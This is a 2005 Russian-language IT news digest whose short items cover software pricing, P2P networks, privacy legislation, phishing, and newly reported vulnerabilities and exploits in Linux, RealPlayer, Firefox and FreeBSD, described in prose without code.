Компания Microsoft определила стоимость так называемой "бюджетной" версии операционной системы Windows, которую планируется распространять на территории Индии. По данным агентства Reuters, облегченный вариант Windows XP Starter Edition переведенная на хинди будет стоить 1000 рупий (около 23 долларов). "Мы намерены и впредь снижать стоимость наших программных продуктов, продаваемых в Индии, для борьбы с процветающим в стране пиратством", - прокомментировал это решение представитель Microsoft Брэдфорд Смит. По его утверждению, уровень нелегального использования программ достигает в Индии 73 процентов. В настоящий момент полная версия Windows XP, продающаяся в стране, стоит около 85 долларов. "Облегченная" версия Windows XP SE отличается рядом ограничений, сделанных, по словам представителей компании, "для удобства начинающих пользователей". Так, количество одновременно запускаемых приложений теперь не превышает трех, пользователи одного компьютера смогут использовать только один "рабочий стол".
Lenta.Ru

2/10/2005 13:13 Айтишники считают покупаемый софт недоработанным
Две трети европейских ИТ-менеджеров считают, что приобретаемые ими софтверные системы выпускаются на рынок, будучи недостаточно протестированными, утверждают авторы доклада из Logica CMG. 75% из них полагают, что тестированием ПО приходится заниматься им самим вместе с ИТ-персоналом. Алекс Гаррик (Alex Garrick), руководитель Logica CMG, сказал: «Наш опрос показывает, что 68% руководителей ИТ думают, что слишком много продуктов и систем выпускается без надлежащего тестирования, а 89% респондентов заявили, что в системах возникают проблемы в течение 48 часов после запуска. Поэтому удивительно видеть, как ИТ-менеджеры берут на себя ответственность инсталляций. Наши результаты также показывают, что половина европейских организаций внедряет новые программы с запозданием». Доклад основан на опросе 255 европейских ИТ-менеджеров
Источник

2/10/2005 12:44 MIT создаёт ноутбук за $100
Многих людей удерживает от покупки ноутбука исключительно его дороговизна. Исследователи из Массачусетского технологического института (Massachusetts Institute of Technology, MIT) планируют предоставить возможность пользователям получить ноутбук всего за $100. Таким образом, они надеются помочь детям и студентам в развивающихся странах. Этот ноутбук будет работать на базе процессора от AMD с тактовой частотой 500 МГц. Он будет оснащён 1 Гб оперативной памяти, интегрированными модулями Wi-Fi, LAN и, может быть, даже GPRS и EDGE. Скорее всего, на ноутбук будет установлен дисплей, изготовленный по специальной технологии, разработанной в MIT, которая позволяет произвести 12-дюймовый дисплей всего за $12. Ноутбук будет работать под управлением операционной системы Linux. Над созданием этого ноутбука также трудятся такие компании как AMD, Brightstar, Google, Red Hat и News Corp. Планируется, что ноутбук будет готов к выпуску в конце 2006 или в начале 2007 года. Он будет распространяться в таких странах как Бразилия, Китай, Египет, Южная Африка и Таиланд.
Источник

2/10/2005 12:22 Интернет-мошенники провели лотерею от имени ФИФА
Новая фишинг-схема использует в качестве средства для обмана пользователей информацию о чемпионате мира по футболу 2006 года, сообщает сайт News.com. Мошенники рассылают электронные письма от имени комитета ФИФА по организации мирового футбольного первенства. Отправители писем извещают получателей о выигрыше в лотерее и просят для получения денег сообщить свои персональные данные, в том числе, данные о банковском счете. Представители ФИФА в специальном заявлении отметили, что не имеют никакого отношения к якобы проведенной лотерее, и предупредили о мошенничестве власти ЮАР, Испании и Великобритании. Согласно тексту письма мошенников, лотерея проводилась в этих странах. По данным сайта SecurityFocus, в течение последних месяцев наблюдается рост числа фишинг-схем, направленных против европейцев. Рассылка писем о выигрыше в лотерею, организованную ФИФА, состоялась через несколько месяцев после рассылки вредоносной программы в письме с информацией о бесплатных билетах на матчи чемпионата.
Подробности

2/10/2005 11:29 В России готовят закон о защите личных данных граждан
В России скоро собирать личные данные граждан можно будет только с их согласия, пишет в пятницу газета "Ведомости". В конце сентября кабинет министров внес в Госдуму законопроект "О персональных данных" и предложил депутатам ратифицировать Конвенцию Совета Европы о защите физических лиц при автоматизированной обработке персональных данных. После того как будет ратифицирована конвенция и принят закон, получать и использовать какие-либо данные о человеке, даже его фамилию и имя, можно будет только с его непосредственного согласия. За сбор данных с нарушениями закона и их утечку предусмотрена административная ответственность в виде штрафов от 50 до 100 минимальных размеров оплаты труда. Если законопроект будет одобрен, пишут "Ведомости", то сведения о религиозных и философских убеждениях человека, состоянии здоровья или судимости вообще нельзя будет выяснять и обрабатывать. Исключение может быть сделано только в случаях, предусмотренных другими законами, например, вопрос о наличии судимости может быть поставлен перед кандидатом в депутаты. По примеру европейских стран в России планируется создать специально уполномоченный орган по защите прав субъектов персональных данных. Новое ведомство получит право расследований в случае нарушения чьих-либо прав, а также будет регистрировать информационные системы, в которых обрабатываются персональные данные. По словам директора департамента правового обеспечения Мининформсвязи Михаила Якушева, если компания захочет собирать информацию о своих покупателях или клиентах, то она будет обязана не только получить их согласие, но и предупредить, для чего будут использоваться эти данные. Все собранные персональные данные должны обрабатываться и храниться в определенной информационной системе, которую надо зарегистрировать в специальном уполномоченном органе по защите прав субъектов персональных данных. А при регистрации будут учитываться те меры безопасности, которые принимаются в информационной системе для предотвращения несанкционированной утечки этой информации. Эти меры помогут прекратить торговлю базами данных на всех перекрестках и утечку информации о клиентах тех или иных компаний, считает Якушев.
Источник

2/10/2005 11:16 Вышел Skype for Windows 1.4
Новая версия популярного VoIP-клиента предлагает пользователям возможность бесплатного голосового общения через интернет, встроенный чат и, что самое интересное, услугу переадресации звонков на три наземные линии по цене от двух центов в минуту, сообщает Internet.Ru. Помимо прочего, появились новые средства персонализации клиента: появились новые версии смайлов, новый сервис My Pictures и новые рингтоны. Версия 1.4 научилась импортировать контакты прямо из MS Outlook и MS IE. Кроме того, теперь программу проще инсталлировать благодаря появлению нового "визарда".
Подробности

2/10/2005 10:11 eDonkey сворачивает сеть
Создатели крупнейшей P2P-сети намерены по примеру BitTorrent податься в коммерческий бизнес и прекратить внутри сети операции по обмену пиратскими файлами. Вчера президент компании MetaMachine, которая разработала и распространяет известную программу eDonkey, сделал официальное заявление перед юридическим комитетом Сената США. Он признал невозможность противостоять могучей ассоциации RIAA. «Поскольку мы не можем позволить себе юридический процесс — даже такой, который, думаем, могли бы выиграть — мы готовимся к преобразованию пользовательской базы eDonkey в сеть по продаже онлайнового контента в „закрытой“ P2P-системе», — сказал Сэм Яган (Sam Yagan), президент MetaMachine. Примечательно, что решение MetaMachine было принято спустя несколько дней после того как аналогичные планы огласила другая крупнейшая P2P-сеть BitTorrent, которая является второй по размеру в интернете после eDonkey. Одновременно с этим прекратила свою работу еще одна известная пиринговая сеть WinMX. Судя по всему, это связано с письмом, которое разослала ассоциация RIAA в адрес семи крупнейших пиринговых сетей 15 сентября. В письме RIAA поставила перед ними условие: либо работать в соответствии с условиями ассоциации, либо прекратить работу вообще. Такие письма были отправлены в адрес MetaMachine, WinMX, LimeWire, BearShare и других.
Более подробно

1/10/2005 12:17 СБУ установила причастность руководства ЦВК к вмешательству в электронную систему "Выборы Президента Украины"
Центральная избирательная комиссия намерена выделить 480 тыс. гривен на покупку дополнительного оборудования для защиты от постороннего вмешательства в работу электронной системы "Выборы". Об этом журналистам в пятницу сообщил председатель ЦИК Ярослав Давыдович. Давыдович заявил, что раньше, в частности, в ходе третьего тура президентских выборов, ЦИК одалживала такое оборудование, поскольку не имела времени закупить его. По словам Давыдовича, оборудование, прежде всего, будет предназначаться для защиты от хакеров. При этом глава ЦИК сообщил, что для Центризбиркома тревожным сигналом стала информация о том, что во время выборов в Болгарии было зафиксировано 1 600 незаконных вмешательств в аналогичную электронную систему. Кроме того, Давыдович сообщил, что ЦИК планирует закупить антивирусные программы последнего поколения для компьютерной техники, которая находится в распоряжении Комиссии. Ранее Служба безопасности Украины передала Генеральной прокуратуре уголовное дело по факту проникновения в электронную систему "Выборы Президента Украины" и уничтожения информации на серверах этой системы. СБУ установила причастность руководства Центральной избирательной комиссии к вмешательству в электронную систему "Выборы Президента Украины" ЦИКа. По словам бывшего председателя СБУ Александра Турчинова, согласно закону, СБУ не может предъявить обвинения причастным к вмешательству в электронную систему ЦИКа, поскольку они имеют первый-второй ранг государственных служащих.
Источник

1/10/2005 11:53 Совместное предложение Cisco и Trend Micro
В Cisco Systems совместно с Trend Micro разработали сервис для сетевого оборудования Cisco, обеспечивающий сдерживание развития вирусных эпидемий в корпоративных сетях - Cisco Incident Control System (ICS). Система автоматически устанавливает политики безопасности на маршрутизаторах и коммутаторах Cisco, руководствуясь информацией по угрозам, поставляемой Trend Micro. Как утверждают в Cisco, сервис позволяет существенно повысить оперативность принятия защитных мер при вирусных заражениях, поскольку ограничительные изменения в конфигурациях устройств автоматически мгновенно тиражируются на всю сеть. На случай, если эти модификации вызовут сбой критически важных приложений компании, в ICS предусмотрена функция отката, позволяющая отменить изменения.
Источник

1/10/2005 11:30 Крупнейшие китайские производители DVD-плееров объявили поддержат HD-DVD
Крупнейшие китайские производители DVD-плееров Amoi Electronics и Sichuan Changhong Electric объявили на днях о своей поддержке HD-DVD. Сообщение об этом пришло буквально на следующий день после аналогичноий инициативы Microsoft и Intel, также примкнувших к группе продвигающих HD-DVD компаний. Данный шаг китайских производителей может оказать лагерю HD-DVD во главе с Toshiba ощутимую помощь в борьбе с главным и единственным конкурентом - форматом Blu-ray от Sony. Одним из ключевых факторов, повлиявших на принятие данного решения, стала относительно простая (по сравнения с конкурирующим форматом) интеграция HD-DVD-технологии с обычными DVD-плеерами, ввиду технологического родства двух форматов. Кроме того, формат HD-DVD обладает довольно весомой поддержкой со стороны многочисленных OEM-сборщиков и разработчиков программного обеспечения. К тому же компании привлекает довольно низкая себестоимость производства HD-DVD-носителей по сравнению с Blu-ray.
Подробности

1/10/2005 11:06 Половина работы для компаний Кремниевой долины выполняется в Индии
Более половины компаний Кремниевой долины пользуются услугами аутсорсинга, и почти половина всех этих заданий уходит в Индию, утверждают авторы исследования, опубликованного в четверг университетом Санта-Клара. Свыше 53% опрошенных в этом месяце компаний Кремниевой долины сообщили, что они отдают на субподряд часть, а то и всю свою работу. И больше всего выигрывает от этого Индия. «В этой стране образованная рабочая сила, и там говорят по-английски, что делает эту страну удобной для аутсорсинга», — пояснил профессор экономики Школы бизнеса Leavey при университете Марио Белотти. Однако в Индии ИТ-руководители пристально наблюдают за другими странами, которые могут отобрать их хлеб. Большую долю работ по аутсорсингу выполняют также Китай, Россия и Филиппины. Например, Китай получает 8% всех заданий, а на долю других азиатских стран приходится 11%. Хотя аутсорсинг остается важным компонентом работы предприятий Кремниевой долины, есть сектора, в которых роль этого компонента снижается. Один из таких секторов, где наблюдается заметное сокращение аутсорсинга, это промышленное производство, отметил Белотти. В августе 39% опрошенных компаний сообщили о том, что за последние три месяца они передавали на субподряд задания по изготовлению промышленных изделий. Два года назад таких компаний было 48%. «В основном это сокращение коснулось полупроводников и электроники», — сказал Белотти.
Подробности

1/10/2005 10:22 Басманный суд отменил собственное решение по одному из дел об электронных библиотеках
Басманный суд Москвы вынес очередное решение по одному из рассматриваемых дел об электронных библиотеках в российском Интернете. Как известно, группа российских писателей по инициативе фирмы "КМ Онлайн", планирующей, по мнению ряда держателей библиотек, захватить как можно большую часть рынка платного доступа к электронным текстам, в 2003 году подала несколько исков против ряда сайтов с электронными книгами. В их числе и самая популярная библиотека российского Интернета "Библиотека Мошкова" (Lib.ru). В числе исков было заявление против ООО "Илосвет", которое поддерживает работу библиотеки edu-all.ru. Иск подавался от имени писателя Эдуарда Геворкяна, произведение которого было размещено в библиотеке. 29 сентября 2004 года Басманный суд принял решение по этому делу и обязал ООО "Илосвет" уплатить Геворкяну 50 тысяч рублей за нарушение имущественных прав автора, запретил ООО "Илосвет" использовать произведение Геворкяна на сайте и отказал Геворкяну во взыскании компенсации за причинение морального вреда. Как сообщил ведущий дела ответчиков юрист Андрей Миронов, вынесенное 29 сентября 2005 года решение отменяет решение годичной давности по вновь открывшимся обстоятельствам. Под ними суд подразумевает то, что Геворкян не имел права подавать требования о компенсации за нарушение имущественных прав, поскольку их он передал компании "КМ онлайн".
Источник

30/09/2005 12:33 JBoss и Microsoft подписали соглашение о сотрудничестве.
Самый продвинутый и успешный, сертифицированный J2EE сервер с открытыми исходниками JBoss и крупнейшая и самая успешная софтверная компания Microsoft подписали соглашение о сотрудничестве. Представители двух компаний в первый день конференции BEA World, заявили, что они теперь будут работать вместе на благо java и JBoss. В конечном счете это сотрудничество имеет целью улучшить работу J2EE приложений, использующих JBoss на платформе MS Windows. Bill Hilf, director of platform technology strategy заявил, что JBoss, дескать, развивающийся колоосальными темпами является главной консолидирующей силой java. На что Shaun Connolly, vice-president of product management at JBoss достойно ответил, что все дело в том, что подавляющее большинство их клиентов, используют JBoss на MS Windows - так что хошь-нехошь - приходится ручкаться с Microsoft. В конечном счете главной целью альянса является возможность взаимодействия JBoss с продуктами Microsoft на платформе MS Windows - Microsoft's Active Directory, Web services, Microsoft Operations Manager, SQL Server и Microsoft's database software и т.п.
Подробности

30/09/2005 11:21 Взломщику обещано 5 тысяч долларов
Компания VIA сообщает о разработке новой технологии StrongBox, которая использует встроенный в VIA C7 и VIA C7-M криптографический движок PadLock Security для создания защищенных виртуальных дисков. Компания готова предложить приз в пять тысяч долларов тому, кто сможет взломать защиту StrongBox – в ходе ежегодного состязания OPEN HACK, которое пройдет на этой неделе в Малайзии. С помощью VIA StrongBox можно создать до 10 виртуальных дисков суммарной емкостью до 40 Гбайт. После создания, виртуальные диски будут существовать в двух основных состояниях – «закрытом» (locked) и «открытом» (unlocked). Информация может быть записана и считана только с открытого диска, в случае его «закрытия» или выключения питания StrongBox зашифровывает его содержимое таким образом, чтобы исключить вероятность случайного или неавторизованного доступа. В качестве алгоритмов шифрования выбраны SHA-1 и AES с 256-разрядным ключом. Как подчеркивает компания в своем пресс-релизе, первый алгоритм одобрен для использовании в военном ведомстве США, а AES считается одним из самых надежных современных алгоритмов.
iXBT

30/09/2005 10:47 Взломана прошивка PlayStation Portable
Буквально на днях, энтузиастами был выпущен патч, делающий из второй версии прошивки для PlayStation Portable версию 1.50, сообщает "Компьюлента". Прошивка 1.50 позволяет запускать на консоли с карт памяти приложения, которые Sony не очень хотела бы видеть работающими, а именно - разнообразные эмуляторы, пиратские версии игр и "самодельные" программы. В firmware 2.0 подобные возможности были исключены. Группа хакеров сумела с помощью "дыры" в модуле управления установкой wallpaper'ов, понизить версию прошивки до 1.50. Естественно, подробные инструкции в считанные часы распространилась по тематическим сайтам интернета. Однако воспользоваться эксплойтом не так-то просто: взлом предусматривает несколько полных перезагрузок системы, в результате которых придется столкнуться с сообщением о том, что обновление firmware прошло с ошибками и необходимо обратится в отдел технической поддержки Sony Computer Entertainment. Способ работает, вероятно, не на всех без исключения консолях, но уже имеется удачный опыт подобной "перепрошивки" японских, американских и европейских экземпляров. Ход теперь за Sony, в очередной раз столкнувшейся с не в меру умелыми пользователями. Компании остается лишь выпустить обновленную версию прошивки, в которой указанная возможность взлома будет устранена. Интересно одно: расщедрится ли при этом Sony на какие-либо дополнительные функции или программное обеспечение, вроде того же браузера в v2.0.
Патч

30/09/2005 10:19 СА представила пакет безопасности для SMB
Корпорация Computer Associates представила пакет решений по безопасности для ОС Windows Server System, предназначенный для использования компаниями среднего бизнеса. Пакет решений CA по управлению безопасностью Business Protection Suite для предприятий среднего бизнеса включает антивирус, антишпионское ПО, продукты для резервного копирования и восстановления информации, а также решения desktop migration. Business Protection Suite предлагается на 10 языках. Стоимость пакета решений для компании с 50 пользователями составит $6,995, что соответствует определению Microsoft компаний среднего уровня как организаций со штатом от 50 до 1000 человек и 25–1000 персональных компьютеров.
Источник

30/09/2005 09:57 Билл Джой: Будущее Web — в мобильных устройства
Билл Джой ставит свои деньги — точнее, деньги своей фирмы венчурного капитала — на Web как на платформу будущего. Джой, соучредитель Sun Microsystems и инициатор создания Berkeley Unix, Java и других технологий, говорит, что взрывной рост количества таких устройств, как сотовые телефоны, PDA и другие беспроводные гаджеты, соединенные с Web, радикально меняет ИТ-индустрию. Он называет это явление «Web при себе» (here Web), так как интернет всегда «с вами, потому что он доступен через устройства, которые вы постоянно носите с собой». В четверг Джой, который сейчас является партнером фирмы венчурного капитала Kleiner Perkins Caulfield & Byers, выступил на конференции по новым технологиям в Кембридже (штат Массачусетс), организованной изданием Technology Review. Прошло более пяти лет с тех пор, как Джой впервые изложил свою модель из шести способов взаимодействия людей с Web — от «ближней» Web (ПК на расстоянии протянутой руки) до D2D, или device-to-device Web, когда системы образуют ячеистую сеть. «В будущем Web при себе станет самым важным, — сказал он. — Теперь у людей много разных устройств». По словам Джоя, такая расширенная Web на руку компаниям вроде Google, которые делают ставку на Web как будущую платформу для наиболее интересных и важных прикладных программ. Он отметил, что деятельность по разработке ПО для основной на сегодняшний день платформы, ПК, постепенно замирает. «Возможно, в какой-то момент Google на платформе Web заменит Microsoft. Какие приложения для ПК сейчас самые модные, захватывающие? Об этом никто ничего не говорит».
ZDNet

30/09/2005 09:34 Microsoft сообщила о первой победе над пиратством в России
Компания Microsoft сообщила о достигнутых ей успехах по борьбе с компьютерным пиратством в России, пишет в четверг газета "Ведомости". Газета приводит оценку гендиректора Microsoft в России Стена Биргера, согласно которой на российском рынке с июля 2004 года по июнь 2005 доля персональных компьютеров, проданных с нелицензионными операционными системами линейки Windows, составила 60% - на 12% меньше, чем за период с июля 2003 года по июнь 2004. По прогнозам компании, через год доля компьютеров с пиратскими Windows упадет еще на 5%. Биргер также сообщил, что продажи Microsoft за последний год выросли на 48%. Руководители российского представительства Microsoft объясняют успехи в борьбе с пиратством маркетинговой активностью компании. Но эксперты считают, что на руку Microsoft сыграл бурный рост рынка более дорогих ноутбуков и рост доходов жителей России. По словам гендиректора одного из ведущих российских сборщиков ПК DEPO Computers Сергея Эскина, сейчас больше внимания закупкам легальных программ стал уделять крупный и средний бизнес, а на розничном рынке за последний год кардинально поменяли свое отношение к продаже компьютеров с предустановленными легальными Windows крупные розничные сети. Ранее сети настаивали на поставках компьютеров без предустановленного ПО, сейчас многие из них нормально относятся к наличию на компьютерах предустановленной лицензионной ОС Windows. "Пиратство при продаже ПК, безусловно, снизилось", - приводят "Ведомости" слова ответственного секретаря комиссии по безопасности информационного рынка Совета предпринимателей при правительстве Москвы Олега Яшина. По его мнению, Microsoft в борьбе с пиратством помог общий подъем IT-рынка в России. Яшин говорит, что сейчас растут продажи более дорогих ноутбуков, в цене которых доля выплаты за лицензию Windows не так велика, как на рынке настольных компьютеров.
Lenta.Ru

29/09/2005 09:23 cardtrp - выдумка антивирусников?
Один из посетителей нашего форума сообщил нам довольно занятную информацию. "По поводу cardtrp, "заражающего смартфоны и ПК". Посмотрите - какие файлы он засылает:
autorun.inf - an autorun file that attempts to execute FSB.EXE once the affected memory card is inserted into a machine
buburuz.ICO - a normal icon file
CARIBE.SIS - detected by Trend Micro as SYMBOS_CABIR.A
---------------------------------------
fsb.exe - detected as BKDR_BERBEW.A
---------------------------------------
SYSTEM.exe - detected as WORM_WUKILL.B.
Так случилось, что мы знакомы с автором BKDR_BERBEW.A , заинтересовавшись, стукнули в асю, и он поведал, что fsb.exe - файл, образующийся на винте после срабатывания шелкода. данный продукт он НИКОМУ не продавал, хотя и запустил в дикую природу. Запускать чужой трой кому-то из работающих в ботнет-индустрии нет смысла - слишком долго с ним разбираться, проще свой сделать. Да и выловить его на просторах инета могли только антивирусники. Похоже, что "универсальный вирус" - всего лишь их выдумка (или их творение), направленная на раскрутку антивирусов для смартфонов".
Источник

28/09/2005 13:26 Вышел второй сервис-пак для Office 2003
Компания Microsoft выпустила второй сервис-пак для пакета MS Office 2003. Помимо пакета обновлений для набора приложений Office Suite 2003 (он включает Word, Excel, PowerPoint, Outlook и др.) были выпущены сервис-паки для автономных приложений семейства Office 2003: OneNote, Project и Visio. В состав второго сервис-пака вошли все исправления и дополнения, включенные в первый пакет обновлений, то есть устанавливать SP2 можно и без предварительной установки SP1. Кроме этого, в новый пакет обновлений включены все патчи, выпущенные после выхода первого сервис-пака и исправления ряда ошибок, для устранения которых отдельных заплаток не выпускалось. В Microsoft предприняли и ряд усилий для повышения стабильности офисных программ. Для этого использовались данные отчетов о сбоях, направлявшиеся в Microsoft пользователями Office 2003. Наконец, в состав второго сервис-пака для Office 2003 входит фильтр фишинга для Outlook 2003. Он работает при наличии в Outlook последней версии базы данных для фильтрации спама. В Microsoft рекомендуют устанавливать все обновления этой базы данных, так как фишинговые письма очень трудно отличить от обычной корреспонденции и при использовании устаревших баз фильтрация будет неэффективной. Пока второй сервис-пак доступен на 12 языках. Среди них есть английский, французский, немецкий, испанский, итальянский, иврит и даже тайский и арабский. А вот на русском языке пакет обновлений пока не выпущен. Скорее всего, русскоязычная версия сервис-пака появится в течение нескольких недель.
"Компьюлента"

28/09/2005 12:49 Американские авиадиспетчеры уязвимы для хакеров
Сети, соединяющие компьютеры авиадиспетчерских систем США, не контролируются должным образом и потенциально уязвимы для удаленных хакеров и инсайдеров. К такому выводу пришли эксперты Департамента подотчетности администрации США (GAO) после исследования проблемы. Представитель FAA Грэг Мартин (Greg Martin) считает, однако, что расследование было слишком узким, и агентство обладает адекватным контролем по всей стране. «Это очень надежные системы. Есть многое, что в отчете не принято во внимание», — сказал он. По мнению Мартина, уязвимости закрыты несколькими перекрывающимися системами и другими средствами управления, встроенными во всю архитектуру ИТ. Однако экспертам GAO удалось обнаружить серию «дыр», в частности, устаревшие планы безопасности, недостаточную подготовку для предотвращению атак, и поставить вопросы о том, может ли FAA обнаруживать вторжения и поддерживать работоспособность системы в случае нарушения защиты. «Агентство неадекватно управляет своими сетями, обновлениям ПО, учетными записями пользователей и паролями, а также привилегиями пользователей», — говорится в отчете. «Закрытость этих систем не может полностью защитить их от атак со стороны недобросовестных сотрудников, знакомых с их возможностями, и от квалифицированных хакеров», — считают авторы отчета.
CNews

28/09/2005 12:10 В Москве открылись компьютерные выставки SofTool и LinuxLand
Во вторник в Москве открылась 16-я российская выставка информационных технологий "SofTool-2005". Мероприятие будет проходить во Всероссийском выставочном центре с 27 сентября по 1 октября. Выставка проводится при поддержке Федерального агентства по промышленности, Федерального агентства по науке и инновациям, Федерального агентства по информационным технологиям, Российской академии наук, правительства Москвы. В рамках SofTool-2005 проходит несколько "дочерних" мероприятий, среди которых - выставка LinuxLand, посвященная "открытому ПО" в России. По сообщению оргкомитета этого мероприятия, "планируется собрать все Linux-компании в одном секторе выставочной площади". Компании получают возможность представить свои продукты конечным пользователям и корпоративным клиентам одновременно. Это самое массовое из проводимых в данной отрасли мероприятий, отмечают организаторы. В частности, сообщается, что в рамках LinuxLand официально представляется система Sand Linux - новый отечественный дистрибутив от компании Cyber System Development. "Sand Linux - это не очередная локализация популярного на Западе продукта, а полноценная операционная система жесткого реального времени, поддерживающая совместимость с исполняемыми файлами традиционного Linux и удовлетворяющая стандартам POSIX 1003.1b и 1003.1c.", - подчеркивают устроители LinuxLand.
Источник

28/09/2005 11:40 Уязвимость в ядре Linux
Harald Welte сообщает о наличии уязвимости в ядре ОС Linux, позволяющей локальному пользователю вызвать DoS с падениям ядра системы. Уязвимость связана с ошибкой при обработке ситуации обращения процесса из пространства пользователя (userspace) к блоку запроса USB (USB Request Block - URB) в процессе обращения к USB-устройству. При прерывании подобного процесса до момента отработки URB происходит зависание системы. Уязвимость обнаружена в крайней версии ядра - 2.6.14-rc2. Автором выпущен неофициальный патч.
Подробности

28/09/2005 11:25 Сразу три браузера стали мишенью злоумышленников
Французы обнаружили в Сети эксплоит, который использует критическую уязвимость сразу в нескольких браузерах. Пользователям рекомендуется срочно установить обновление. В интернете обнаружен эксплоит для ошибки, связанной с обработкой международных доменных имен (IDN) в браузерах Mozilla и Firefox. Об этом вечером сообщила французская компания FrSIRT – разработчик ПО в сфере защиты данных. Пользователям браузеров Mozilla следует поспешить и установить недавно опубликованный патч, устраняющий данную уязвимость. Напомним, что на прошлой неделе в Сети появилась информация о серьезной "дыре", связанной с обработкой международных доменных имен (IDN) в национальных кодировках. При попытке перейти на специфически сформированный URL происходило переполнение, позволяющее злоумышленнику выполнить на компьютере жертвы произвольный код. FrSIRT предупреждает пользователей браузеров Firefox и Mozilla о том, что уязвимость представляет серьезную опасность для их систем. Исходный код эксплоита, как обычно, опубликован компанией на ее сайте. Комментируя ситуацию, автор эксплоита, голландский программист Беренд-Ян Вевер (Berend-Jan Wever), который уже создавал эксплоиты для уязвимостей Internet Explorer, сообщил, что данный код вызывает переполнение буфера динамической памяти, в результате чего хакер может получать полный контроль над пораженной машиной, на которой запущены браузеры Firefox, Mozilla и даже Netscape. Как и в случае с другими браузерными эксплоитами, компьютер пользователя будет атакован этим кодом, только если пользователь посетит вредоносный сайт. Как правило, для заманивания жертв на такие сайты используются рассылки спама.
Эксплоит

28/09/2005 11:13 Операторы готовы вычислять краденые мобильники
Два сотовых оператора из "большой тройки" поддержали инициативу столичного ГУВД по контролю за оборотом мобильных телефонов. В МТС, видимо, пока не сформировали окончательную точку зрения. ГУВД Москвы планирует ужесточить контроль за оборотом средств мобильной связи. Соответствующее предложение, как передавало РБК, обсуждалось на заседании комиссии по безопасности Мосгордумы 26 сентября. Столичное ГУВД предлагает, в частности, обязать операторов связи определять установленные производителем идентификационные номера мобильных телефонов и проводить его сверку с реестром похищенных телефонов. Расходы, связанные с установкой программно-технических средств определения таких номеров, должны взять на себя операторы связи. Предлагается также обязать их незамедлительно сообщать уполномоченным государственным органам о совпадении идентификационного номера с реестром украденных телефонов. Все ведущие сотовые операторы, кроме МТС, однозначно положительно отозвались об инициативе столичного ГУВД. В частности, в компании "Вымпелком" (торговая марка "Билайн") считают, что данный шаг будет действовать в интересах клиентов и поэтому он заслуживает одобрения. Однако в нынешнем виде проект ГУВД не устраивает компанию. "Если все процедуры взаимодействия между всеми задействованными в процессе сторонами будут тщательно проработаны и если в данный процесс включаться все операторы России, то в таком случае успех будет гарантирован. Но, в данной редакции проект явно требует доработок", - сообщили в пресс-службе "Вымпелкома".
Подробности

28/09/2005 10:29 GPL 3 может закрыть веб-лазейку
Не исключено, что веб-компании будут вынуждены публиковать исходный код любых программ, лицензируемых по GPL, которые они применяют в своих коммерческих службах. Следующая версия лицензии GPL может создать проблему для веб-компаний, использующих свободное ПО в коммерческих веб-приложениях, но не распространяющих их исходный код. В настоящее время компании, распространяющие ПО по лицензии GPL, должны публиковать его исходный код, включая любые внесенные ими изменения. Хотя это правило охватывает многие предприятия, использующие лицензируемое по GPL ПО в коммерческих целях, оно не относится к веб-компаниям, применяющим такое ПО для предложения своих услуг через веб, так как они не распространяют собственно ПО. Однако GPL 3, следующая версия лицензии open source, проект которой планируется выпустить в начале 2006 года, может закрыть эту лазейку. Об этом сообщил автор GPL и глава Free Software Foundation (FSF) Ричард Столлман в интервью O'Reilly Media. Столлман сказал, что разработчикам, возможно, придется добавить в свои лицензируемые по GPL веб-приложения команду, которая позволяет пользователям загружать исходный код. Дополнительный пункт GPL 3 сделает обязательным включение такой команды и в модифицированные версии программы. Это изменение не должно повлиять на существующее ПО, но должно будет учитываться разработчиками в будущих версиях тех же программ. По словам Столлмана, это лишь «предварительный план», так как он еще не полностью изучен на предмет работоспособности. В GPL 3 может войти также пункт о наказании компаний, использующих программные патенты против свободного ПО, и пункт, препятствующий использованию в приложениях свободного ПО средств управления цифровыми правами (DRM). Столлман сказал, что один возможный способ борьбы с DRM — заставить компании распространять сигнатурные ключи двоичного кода приложений свободного ПО
ZDNet

28/09/2005 10:07 США снова отказались делить Интернет
В понедельник в штаб-квартире ООН состоялось заседание, посвященное проблемам информатизации мирового сообщества. Как пишет во вторник газета Washington Times, в ходе заседания представитель США Дэвид Гросс (David Gross) еще раз подтвердил намерение американских властей никому не отдавать контроль за базовыми структурами Интернета, несмотря на высказывания представителей некоторых государств. Как напоминает газета, ряд стран, в числе которых Китай, Бразилия, ЮАР, Иран, Саудовская Аравия, Норвегия, Швейцария и Россия, недавно выступили с предложением передать "контроль над Интернетом" в руки международного сообщества - предположительно, некоего особого органа при ООН, который может быть создан специально для этой цели. В настоящее время распределением адресного пространства в глобальной сети занимается общественная международная организация ICANN, которой делегировало полномочия Министерство торговли США, получившее контроль над Интернетом от Пентагона, который его изначально разработал. Американское министерство имеет право наложить вето на решения ICANN и отозвать полномочия. Теоретически Интернет может работать и без ICANN - разрозненные части Интернета могут существовать отдельно, но в этом случае нарушится единая система адресации, с помощью которой сейчас разные компьютеры опознают друг друга. Сейчас идет подготовка к Всемирному саммиту по информационному сообществу (World Information Society Summit) - центральному регулярному мероприятию ООН, посвященному роли информации в современном мире. Он должен пройти в Тунисе в ноябре. Вопрос о международном контроле над Интернетом предполагается обсудить там, недавно были подготовлены 4 специальных сценария коллективного управления Сетью, однако вновь подтвержденная позиция США о нежелании уступать контролирующие функции сводит эти усилия на нет. Как подчеркнул Гросс, США обеспечивают "стабильность и работоспособность Интернета", и не намереваются что-либо изменять, считая Интернет важным инструментом для мирового бизнеса и общественности.
Подробности

27/09/2005 13:56 Уязвимость в RealPlayer
Open Security Group сообщает о наличии уязвимости в популярном ПО RealPlayer (а также Helix Player) для Unix/Linux платформ. Уязвимость типа форматной строки позволяет выполнить произвольный код в уязвимой системе. Подтверждена в RealPlayer 10.0.5.756 (gold). Авторами выпущен эксплоит, позволяющий вызвать шелл на удалённой системе с полномочиями пользователя, запустившего специальным образом сформированный медиа-файл форматов .rp (realpix) и .rt (realtext).
Описание уязвимости

27/09/2005 13:16 Эксплоит уязвимости imap4d в FreeBSD
Опубликован эксплоит уязвимости imap4d из состава набора утилит GNU Mailutils 0.6 для ОС FreeBSD. Об уязвимости форматной строки в запросе 'search' в этом ПО сообщили 9.09 сего года специалисты из iDEFENSE. Эксплоит написан Johnny Mast и Angelo Rosiello, и демонстрирует возможность запуска произвольного кода в FreeBSD.
Эксплоит

27/09/2005 11:51 Полностью защитить онлайновые платежи от мошенников в ближайшее время не получится
